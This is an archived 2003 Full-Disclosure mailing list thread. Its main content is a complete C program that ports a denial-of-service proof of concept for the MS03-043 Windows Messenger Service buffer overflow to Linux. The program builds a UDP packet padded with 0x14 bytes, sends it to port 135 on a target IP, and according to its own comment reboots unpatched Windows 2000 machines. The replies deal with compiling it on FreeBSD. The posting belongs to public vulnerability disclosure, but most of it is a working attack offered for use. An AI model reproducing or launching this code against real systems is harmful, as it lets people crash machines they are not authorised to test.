lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Linux Ported Version of MS03-043 DOS

i'll write a port to *bsd as well if u guys want it ant exactly hard
  ----- Original Message ----- 
  From: Perrymon, Josh L. 
  To: 'VeNoMouS' ; full-disclosure@...ts.netsys.com 
  Sent: Tuesday, October 21, 2003 7:46 AM
  Subject: RE: [Full-Disclosure] Linux Ported Version of MS03-043 DOS


  Anyone got this to compile on FreeBSD 4.8?

  I get the following


  In file included from ms043DOS.c:39:
  /usr/include/arpa/inet.h:89: warning: parameter has incomplete type
  /usr/include/arpa/inet.h:92: warning: parameter has incomplete type
  /usr/include/arpa/inet.h:96: warning: parameter has incomplete type
  ms043DOS.c: In function `main':
  ms043DOS.c:84: storage size of `addr' isn't known

  -JP
    -----Original Message-----
    From: VeNoMouS [mailto:venom@...-x.co.nz]
    Sent: Sunday, October 19, 2003 9:46 PM
    To: VeNoMouS; full-disclosure@...ts.netsys.com
    Subject: Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS


    btw sorry forgot to add, i tested this on sp3, so it effects sp4 and sp3
      ----- Original Message ----- 
      From: VeNoMouS 
      To: full-disclosure@...ts.netsys.com 
      Sent: Monday, October 20, 2003 2:33 PM
      Subject: [Full-Disclosure] Linux Ported Version of MS03-043 DOS


      Here you go guys or get it via www.gen-x.co.nz/ms03-043.c

      <<<<<<<<<<<<<<<<<< SNIP >>>>>>>>>>>>>>>>>>>>>>>>

      /*
      Mon Oct 20 14:26:55 NZDT 2003

      Re-written By VeNoMouS to be ported to linux, and tidy it up a little.
      This was only like a 5 minute port but it works and has been tested.
      venom@...-x.co.nz

      greets to str0ke and defy


      DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
      Launching it one or two times against the target should make the
      machine reboot. Tested against a Win2K SP4.

      "The vulnerability results because the Messenger Service does not
      properly validate the length of a message before passing it to the allocated
      buffer" according to MS bulletin. Digging into it a bit more, we find that when

      a character 0x14 in encountered in the 'body' part of the message, it is
      replaced by a CR+LF. The buffer allocated for this operation is twice the size
      of the string, which is the way to go, but is then copied to a buffer which
      was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks

      and overflow the fixed size buffer.

      Credits go to LSD :)

      */

      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <unistd.h>
      #include <errno.h>
      #include <time.h>

      #include <sys/types.h>
      #include <sys/socket.h>
      #include <arpa/inet.h>





      // Packet format found thanks to a bit a sniffing
      static unsigned char packet_header[] =
      "\x04\x00\x28\x00"
      "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
      "\x4f\xb6\xe6\xfc"
      "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
      "\xff\xff\xff\xff"
      "\xff\xff\xff\xff"
      "\xff\xff\xff\xff"
      "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\xff\xff\xff\xff"
      "\xff\xff\xff\xff" // @74 : fields length
      "\x00\x00";

      unsigned char field_header[] =
      "\xff\xff\xff\xff" // @0 : field length
      "\x00\x00\x00\x00"
      "\xff\xff\xff\xff"; // @8 : field length


      int usage(char *name)
      {
       printf("Proof of Concept for Windows Messenger Service Overflow..\n");
       printf("- Originally By Hanabishi Recca - recca@...l.ru\n\n");
       printf("- Ported to linux by VeNoMouS..\n");
       printf("- venom@...-x.co.nz\n\n\n");

       printf("example : %s -d yourputtersux -i 10.33.10.4 -s n0nlameputer\n",name);
       printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n");
       printf("-s <src netbios name>\n");
       return 1;
      }


      int main(int argc,char *argv[])
      {
              int i, packet_size, fields_size, s;
              unsigned char packet[8192];
              struct sockaddr_in addr;
        char from[57],machine[57],c;
              char body[4096] = "*** MESSAGE ***";  

        if(argc <= 2) 
        {
        usage(argv[0]);
        exit(0);
        }

          while ((c = getopt (argc, argv, "d:i:s:h")) != EOF)
        switch(c)
         {
         case 'd':
            strncpy(machine,optarg,sizeof(machine));   
            printf("Machine is %s\n",machine);
            break;
         case 'i':
                  memset(&addr, 0,sizeof(addr));
                  addr.sin_family = AF_INET;
                  addr.sin_addr.s_addr = inet_addr(optarg);
                  addr.sin_port = htons(135);
            break;
         case 's':
                  strncpy(from,optarg,sizeof(from));
            break;

         case 'h':
            usage(argv[0]);
            exit(0);
            break;
         }
            
              // A few conditions :
              // 0 <= strlen(from) + strlen(machine) <= 56
              // max fields size 3992

        if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); exit(0); }

              if(!strlen(machine)) { printf("Ummmm we also need the dest netbios name bro...\n"); exit(0); }

        if(!strlen(from)) strcpy(from,"tolazytotype");

              memset(packet,0, sizeof(packet));
              packet_size = 0;

              memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
              packet_size += sizeof(packet_header) - 1;

              i = strlen(from) + 1;
              *(unsigned int *)(&field_header[0]) = i;
              *(unsigned int *)(&field_header[8]) = i;
              memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
              packet_size += sizeof(field_header) - 1;
              strcpy(&packet[packet_size], from);
              packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

              i = strlen(machine) + 1;
              *(unsigned int *)(&field_header[0]) = i;
              *(unsigned int *)(&field_header[8]) = i;
              memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
              packet_size += sizeof(field_header) - 1;
              strcpy(&packet[packet_size], machine);
              packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

              fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
              memset(body, 0x14, sizeof(body));
              body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';

              i = strlen(body) + 1;
              *(unsigned int *)(&field_header[0]) = i;
              *(unsigned int *)(&field_header[8]) = i;
              memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
              packet_size += sizeof(field_header) - 1;
              strcpy(&packet[packet_size], body);
              packet_size += i;

              fields_size = packet_size - (sizeof(packet_header) - 1);
              *(unsigned int *)(&packet[40]) = time(NULL);
              *(unsigned int *)(&packet[74]) = fields_size;

              fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body),packet_size, fields_size);


       if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 )
        {
         perror("Error socket() - ");
         exit(0);
        }
       
              if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1)
        {
         perror("Error sendto() - ");
         exit(0);
        }


              exit(0);
      }
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031021/e7fc8c15/attachment.html

Powered by blists - more mailing lists